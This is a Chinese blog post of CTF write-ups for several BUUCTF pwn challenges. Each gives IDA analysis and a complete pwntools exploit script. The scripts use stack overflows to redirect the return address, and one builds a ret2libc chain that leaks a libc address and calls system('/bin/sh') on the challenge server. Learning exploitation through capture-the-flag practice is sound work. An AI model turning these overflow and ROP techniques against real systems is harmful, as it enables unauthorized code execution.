Pwn_BUUCTF

最新推荐文章于 2022-12-16 11:16:57 发布
最新推荐文章于 2022-12-16 11:16:57 发布
阅读量721 收藏
点赞数 2
分类专栏: CTF Pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YangZiTrick/article/details/108803528
版权
Pwn 同时被 2 个专栏收录
16 篇文章 2 订阅
订阅专栏
CTF
5 篇文章 0 订阅
订阅专栏

Pwn_BUUCTF

1.test_your_nc

直接 nc

cat flag

直接出flag,白给题

2.rip

IDA分析

看main:
在这里插入图片描述
直接进 getss
在这里插入图片描述

发现偏移:0xF + 8

写exp

paylode=a*(0xF+8)

回到 IDA 看到 “/bin/sh” 的地址 :40118A

在这里插入图片描述

写脚本
完整exp

from pwn import *

p=remote('node3.buuoj.cn',27019)

payload='a'*(0xf+8) + p64(0x40118A)

p.sendline(payload)

p.interactive()

运行

在这里插入图片描述
flag

2020.9.25 - 21:00

3.warmup_csaw_2016

IDA分析

在这里插入图片描述
在这里插入图片描述

找到flag.txt函数地址

40060D

接下去看 main

在这里插入图片描述
一开始我是 (0x80+8) ,后来师傅说是用后面的 gets(&v5); 来做返回。
所以这里的偏移应该是 v5 的空间。

paylode=‘a’*(0x40+8) + p64(0x40060D)

完整exp

from pwn import *

#p=process('')
p=remote('node3.buuoj.cn',27170)

payload='a'*(0x40+8) + p64(0x40060D)

p.sendline(payload)

p.interactive()

运行,出flag
在这里插入图片描述

4.pwn1_sctf_2016

IDA分析
是个32位程序

在这里插入图片描述
再gdb分析一波

在这里插入图片描述

输入 I 变成了 you , 有溢出

paylode=‘I’*0x14+‘a’*4

找到 flag 地址

在这里插入图片描述

0x8048F1F

完整exp

from pwn import *

#p=process('')
p=remote('node3.buuoj.cn',28696)

payload='I'*0x14+'a'*4 + p32(0x08048F0D)

p.sendline(payload)

p.interactive()

flag

5.ciscn_2019_n_1

IDA分析一波

在这里插入图片描述

要让 v2 = 11.28125

可以找到 11.28125 在程序中的表达

在这里插入图片描述

41348000h

func() 知道 v130hv24h
那么我们填充的字符数量就应该是 30h - 4h = 2c

在这里插入图片描述

写exp

from pwn import *

p=remote('node3.buuoj.cn',27434)

payload='a'*0x2c+p64(0x41348000)
p.recvuntil("Let's guess the number.")
p.sendline(payload)

p.interactive()

r.recvuntil("Let's guess the number.")

直到程序运行到括号里的字符串时停下

jarvisoj_level0

ida

在这里插入图片描述
跟进函数
在这里插入图片描述
发现一个可以栈溢出的点

在这里插入图片描述

并且题目给出了/bin/sh

easy
exp:

from pwn import *
p=remote('node3.buuoj.cn',25190)
payload = 'a'*0x88 + p64(0x400596)
p.sendline(payload)
p.interactive()

[OGeek2019]babyrop

libc 32

先ida分析

在这里插入图片描述

从第十行read看出buf是一个随机数,然后作为参数传入了11行的函数中,之后返回值赋值给v2,v2再传入了12行的函数中,我们先看看11行中的函数

在这里插入图片描述

只有结尾时return v5,同时有一个read可以让我们进行栈溢出,使v5变成我们想要的东西
我们再看下一个函数

在这里插入图片描述
让a1等于127我们就能利用read函数进行漏洞利用

所以在上一个函数我们要想办法让它返回127

后头看
在这里插入图片描述

buf传参给了a1,a1又给了s
v6为read的返回参数,若有输入,则返回长度
下面if拿传参进来的那个随机数和我们输入的字符进行比较,若是不相同则直接exit
所以这里我们可以用\x00来绕过strlen,使v1=0,因为strlen遇到\x00之后就会中断,这样到strncmp的时候就会直接跳过,因为长度为0了
在read输入\x00之后输入2C-25=7个的16进制的127就完成了栈溢出利用
exp:

# -*- coding:utf-8 -*-
from pwn import *
from LibcSearcher import *

p=remote('node3.buuoj.cn',28017)
#r=process('./pwn')
elf=ELF('./pwn')
write_plt=elf.plt['write']
read_got=elf.got['read']
read_plt=elf.plt['read']
main_addr=0x08048825#elf.symbols['main']

payload0 = '\x00'+'\xff'*7
p.sendline(payload0)


payload = 'a' * (0xe7+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(read_got) + p32(0x8)
p.recvuntil('Correct\n')
p.sendline(payload)

read_addr = u32(p.recv(4))
print(hex(read_addr))

libc_bash = read_addr - 0x0d4350
sys_addr = libc_bash + 0x03a940
bin_sh = libc_bash + 0x15902b
p.sendline(payload0)

getshell = 'a'*(0xe7+4) + p32(sys_addr) + 'aaaa' + p32(bin_sh)

p.recvuntil('Correct\n')
p.sendline(getshell)
p.interactive()

参考

_Trick_
关注
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 930
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 632
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
BUUCTF pwn
qq_40026795的博客
06-20 701
test_your_nc 丢进ida可以看到只有一个后门函数 使用nc 网址 端口连接反弹shell 或者使用pwntools连接 frompwnimport* p=remote('网址',端口) p.interactive() rip 一、载入ida 载入ida可以看到主要有两个函数,main()和fun() 使用f5产生类C代码 int__cdeclmain(inta...
buuctfpwn
个人笔记
04-04 3144
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
Buuctfpwn
qq_53809201的博客
05-07 696
1.pwn1 from pwn import * log_level = 'debug' elf = ELF("./pwn1") local = 0 if local: r = process("./pwn1") else: r = remote("node4.buuoj.cn",29317) bin_sh = 0x000000000040118A system_addr = 0x0000000000401191 payload = b'a'*0x0F + p64(system_addr) +
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 984
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3097
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 345
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2529
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
BUUCTFpwn题解(一些栈题+程序分析)
热门推荐
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
BUUCTF-pwn(18)
njh18790816639的博客
07-10 843
360chunqiu2017_smallest 整体较为简单; 先放个exo;较为简单; from pwn import * context(arch='amd64', os='linux', log_level='debug') binary = './smallest' #r = remote('node4.buuoj.cn',26277) r = process(binary) elf = ELF(binary) main_addr = 0x4000B0 mov_edx_400 = 0x4000
BUUCTF-pwn(13)
njh18790816639的博客
01-17 611
wustctf2020_number_game 此时运用我们的计算机底层的知识,可知,计算机底层储存形式为补码! -2147483648的补码形式为0x80000000,它取反加一之后仍然是0x80000000,因此这边输入-2147483648 护网杯_2018_gettingstart 此时又要用到我们的数学知识! 转换浮点数工具 from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './2
BUUCTF-PWN
weixin_52125240的博客
12-04 2418
BUUCTF-PWN1.test_your_nc2.rip3.warmup_csaw_20164.ciscn_2019_n_15.pwn1_sctf_2016 1.test_your_nc 根据名字的提示,来测试一下我们的nc cat flag 得到我们的flag nc的使用 nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等 常用语法: nc [-hlnruz][-g<网关...>][-G<指向器数目&
二进制的保护机制
weixin_30872671的博客
05-29 260
这里主要讲的是CTF中linux下的ELF二进制文件的保护机制。在linux中有一个脚本checksec命令可以查看当前二进制文件的保护机制。任意安装一款gdb插件都会把checksec脚本包含进来。 在gdb中执行: gdb> checksec test Canary : No NX ...
buuctf——pwn刷题之旅(持续更新)
qq_42988973的博客
12-16 575
buuctf-pwn 的一些wp
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 434
buuctf-pwn 001-016题wp
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1115
buuctf pwn
BUUCTF PWN题刷题记录 (未完待续)
qq_41071646的博客
08-01 2017
最近找了一个新的CTF比赛平台 但是不知道为啥pwn的服务器总是连不上, 所以到时候还是直接本地打 默认2.23 so 如果 有高版本的话 我再切换,,, 逆向的话 先等等吧,,,先不刷。。等有空了再刷 第一题 连上就有flag的pwn 直接 运行就有权限,。 第二题 RIP覆盖一下 这个没有任何保护 直接 覆盖rip就可以了 from pwn import * conte...
buuctf pwn
最新发布
10-01
buuctf pwn是指一个CTF比赛中的pwn题目,其中包含了经典的栈溢出漏洞、ret2system和ret2text的漏洞利用方法。在栈溢出漏洞中,通过向缓冲区中输入超过其容量的数据,覆盖掉程序的返回地址,从而控制程序的执行流程。而ret2system是一种漏洞利用技术,通过修改返回地址为system函数的地址,来实现执行系统命令的目的。ret2text是一种类似的漏洞利用技术,通过修改返回地址为.text段中的某个特定地址,来实现执行指定代码的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值